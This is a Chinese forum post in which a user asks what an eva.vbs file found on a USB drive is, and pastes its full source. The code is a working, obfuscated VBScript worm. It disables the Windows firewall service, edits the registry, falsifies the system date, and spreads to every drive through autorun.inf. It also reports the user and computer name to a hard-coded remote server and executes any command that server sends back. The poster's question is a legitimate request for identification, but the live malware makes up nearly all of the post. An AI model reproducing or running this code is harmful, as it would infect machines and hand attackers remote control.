关于U盘传播型病毒eva.vbs
在U盘里面发现一个eva.vbs和一个打开其的autorun.inf
卡巴最新没报,请教这个是什么毒?有什么影响?
oN erROR reSuMe NeXT
sEt FsO=creAtEoBjeCT(strreVERSe("tceJbOmetsyseLif.GnITpIrCS"))
sEt WSHshELL=cREaTeOBjECt(strReverSe("lLehS.tPIrCsw"))
Dim dRi_LiSt,Dri_lIst0
DIm iSSEND
IsseND=0
c_TImE=dATE()
wShShElL.RuN "net STop SHarEdaCcESS",0
sET DRVs=fsO.dRIveS
SysDiR=FSo.GEtsPecIaLFoldEr(1)
THIspath=WSCrIpt.sCrIptfullnAme
sET Fc=FSo.opeNtEXTFilE(ThiSPaTh,1)
sCopy=fc.rEaDalL
Fc.CLoSe
sET Fc=NoThINg
CAll wRiteFILE(sySDIR&"\SysiNFO.reg",UnEScAPE(sTrrEvErSe("00C2%00c2%00c2%00c2%00c2%00C2%00C2%00C2%00C2%00c2%00C2%00C2%00C2%00C2%00C2%00A3%92%b82%xehd3%22%eMitceXe22%a0%d0%02%22%22%d3%22%sreTeMARAp22%A0%D0%02%22%SbV.gfCnrpc5%C5%23mEtsYSc5%c5%52%RidNiW52%22%D3%22%TpirCS22%a0%D0%02%D5%0C5%0c5%pUTrATsC5%stPirCsC5%eNIHcAmC5%etATsc5%YciLop02%PUORGC5%NOiSREvTneRRuCC5%SWODniWc5%TFoSORciMc5%eRAwtfOsC5%enIHCam_laCOL_yEkhb5%a0%d0%a0%D0%02%00c2%00C2%00c2%00C2%00C2%00C2%00C2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00c2%00a3%92%b82%xehD3%22%eMITCExe22%a0%D0%02%22%22%D3%22%srEtEmArAP22%a0%d0%02%22%Sbv.gfCnRPC5%C5%23MeTSYsC5%C5%52%rIDNIw52%22%D3%22%tPirCs22%a0%d0%02%D5%0c5%0C5%PuTratsC5%stpircsC5%mEtSYsC5%SWodniwC5%TFOsoRCImc5%sEiCIlOPc5%erAwtfoSc5%eNihCam_LaCol_yEKhB5%A0%d0%a0%D0%03%03%e2%53%02%E6%F6%96%37%27%56%65%02%27%f6%47%96%46%54%02%97%27%47%37%96%76%56%25%02%37%77%f6%46%e6%96%75%")))
WShSHEll.ruN "RegeDiT /s SYSinfo.REG",0
wsCrIpt.sleeP 200
FsO.DELetefiLe SYSdiR&"\sYSiNfO.rEG",truE
if iNstR(tHisPAtH,sYsDIr)>0 tHeN
DrI_liSt0=liSTDRv()
O_TimE=leFT(C_timE,3)&cSTR(iNt(MiD(C_TIMe,4,1))-1)&riGHt(C_tImE,LEN(C_tIMe)-4)
wSHsHEll.RUN "CmD /C DATe "&o_tIMe,0
WsCriPT.sleep 10000
foR Dri_i=1 To lEn(DrI_LISt0)
CaLL WriTEAutO(mId(DrI_lIst0,dri_I,1)&":\")
NeXt
wSHsHelL.RuN "CmD /c dAte "&C_timE,0
coMputERNAme="":uSErNAMe=""
sEt oBJWmIsErvicE=getOBjeCt("wINMGMTS:{IMpERSoNatIOnLEveL=IMpeRsOnATe}!\\.\roOt\Cimv2")
seT ColcomPUTErS = oBjWmiserviCe.eXeCQuErY("selecT * FRom WIn32_cOmPUtERsYsteM")
FoR eAch obJCoMpuTer iN cOlCoMPuTeRS
CoMpUtErName=OBJCOmPUtEr.NAMe
uSErNAme=ObjComPuTeR.USErNaMe
nExt
IF uSerNamE="" THeN uSERnAme="evAr"
IF iNsTr(useRNamE,"\")<=0 ThEn
uSERname=cOmPuTernaMe&"\"&useRnamE
EnD If
do
If ISsenD=0 tHEn
SEt XML=crEateOBjEct(stRrEVErSe("ptThLmxReVrES.2lMXsm"))
xMl.opEN "GeT",StRREVeRse(UnEScaPE("%3d%61%3f%70%73%61%2E%74%6E%75%6F%63%2f%61%76%65%2F%62%7a%7a%2F%30%30%31%2E%34%30%31%2E%39%31%31%2e%32%30%32%2f%2F%3a%70%74%74%68"))&uSeRnamE,0
XMl.sETreqUEsThEAdER "useR-agENt","EvaR"
XmL.sEnd()
iF ErR.nUmBEr=0 ThEn
IssenD=1
rES=XmL.REsPonSEtEXt
If UcaSe(lEfT(ReS,7))=uCase("ExeCutE") ThEN eXEcUTE Res
elSe
ERR.cLeAr
enD if
sET xmL=NoThIng
End if
dRi_liSt=lisTdrv()
FoR dRi_k=1 tO LeN(Dri_LIst)
iF INsTR(Dri_List0,mId(Dri_lIST,Dri_k,1))<=0 ThEN
cALl WrItEaUtO(mid(DRI_lISt,dRI_K,1)&":\")
ENd If
nExT
DRi_lIst0=Dri_lISt
wsCriPT.sLEEp 1000
Loop
eLse
WShsHeLl.run "exPloRER .\",3
WscRIPt.sleeP 2000
wShShelL.apPactIvATe uNeScapE(LcASE("%u6211%u7684%u7535%u8111"))
wsHshElL.SeNdkEys uCasE("% C")
RunFlAg=0
For eACH Ps In gETOBjEct _
("WInmGmtS:\\.\ROOt\cImv2:Win32_ProCesS").INsTANcES_
iF lcAse(ps.NAMe)=lCaSe("WScrIpt.EXe") ThEn
rUNFlag=ruNfLaG+1
EnD if
neXt
If RuNfLaG>=2 tHeN WscrIPt.qUIt
SEt SF=fso.getFOlDer(sySdIR)
f_TimE=LefT(Sf.DaTeCReaTeD,InStR(sf.DATECrEAtEd," ")-1)
wSHshELl.Run "CmD /C dAtE "&f_time,0
WscRipT.SlEEP 100
CaLl wRitEfiLE(SysDiR&LcasE("\PrnCFG.vBS"),vS(sCOPy))
wShShEll.rUn "cmD /c datE "&c_tImE,0
wShSHEll.RUn sYSdIr&"\PRNCfg.Vbs"
eNd If
fUNCtIon vs(sTr)
ExECuTe StrReVeRsE(UnescAPE("%29%29%22U%25%22%28esACl%2c%29%22u%25%22%28esAcu%2CSv%28eCalPER%3DSv%0d%0AtXen%0d%0afI%20dnE%0d%0ac%26sV%3DSV%0D%0aEsLe%0D%0a%29c%28eSacl%26Sv%3Dsv%0d%0AnEHt%2005%3e%29001*%29%28dnR%28tNI%20FI%0d%0aeZImOdNAr%0d%0A%29%291%2ci%2crtS%28DIM%28ESAcu%3dC%0D%0A%29rts%28NEL%20OT%201%3DI%20RoF"))
END FuNCtioN
fuNCtiON liSTDRV()
EXECUTe stRReVERsE(UNesCape("tSIL_Pmt%3dVRDtsIL%0d%0ATXen%0d%0AfI%20dNe%0d%0arEttelEViRD.VrD%26tSil_pMT%3DtSIL_PmT%0D%0aneht%20YDAersi.vRD%20fi%0d%0AsVRd%20nI%20VRd%20HCaE%20roF%0D%0A%22%22%3dtsIL_Pmt%0D%0ATSIL_pmT%20mId"))
ENd FuncTIOn
sUB wrITEAUTO(pATH)
eXecUTe STrREVErsE(uneScAPE("fi%20DNE%0D%0aeurT%2c%22fNI.nUROtuA%22%26htAp%20ELiFEtElED.osF%0D%0ANEHt%20%29%22FNI.nurotua%22%26hTaP%28StsIXeelIf.Osf%20FiesLE%0D%0A%29%28dNR%26hTAP%2C%22fni.NURotuA%22%26HTAp%20rEdLoFeVOM.OsF%0d%0ANehT%20%29%22FNI.NURoTUA%22%26hTAp%28sTSIXerEdlof.oSF%20fi"))
CmdSTR="shELL\*\coMMAnD=WscRiPT.eXe "&chr(34)&"EvA.vbs"&cHr(34)
AUToStR="[AUtorun]"&VBCrlf&"oPEn="&vBCrlf&rEPlace(CmdsTR,"*","oPEN")&VBcRLf&REPLAce(cmdSTR,"*","EXPLORE")&VBcRlF&RePLACE(CMdstR,"*","fiND")
CALL WRiTEFILE(PatH&uCASe("AUtoRun.iNf"),aUtostr)
caLL writEFIle(paTH&"EVA.vBs",vs(scOpy))
eND SuB
Sub wRITEFiLE(fPaTh,CONtent)
eXECute StRRevErsE(uneScAPe("gnIhtoN%3dAF%20TES%0d%0a7%3DSETUBirtta.AF%0d%0A%29HTAPF%28ELiFtEg.oSF%3DaF%20tES%0d%0agNIhtoN%3DCF%20TES%0D%0aeSOlC.Cf%0D%0aTnetnOc%20eTirw.cF%0d%0A%29euRT%2c2%2CHTaPF%28ElIFtxEtnEpo.oSF%3DcF%20tes%0d%0AEURT%2CHtApF%20ELifeteled.OSf%20NeHT%20%29HtapF%28stsixEeliF.osF%20fI"))
ENd SuB
谢谢
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; eBook; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; CIBA; MAXTHON 2.0)
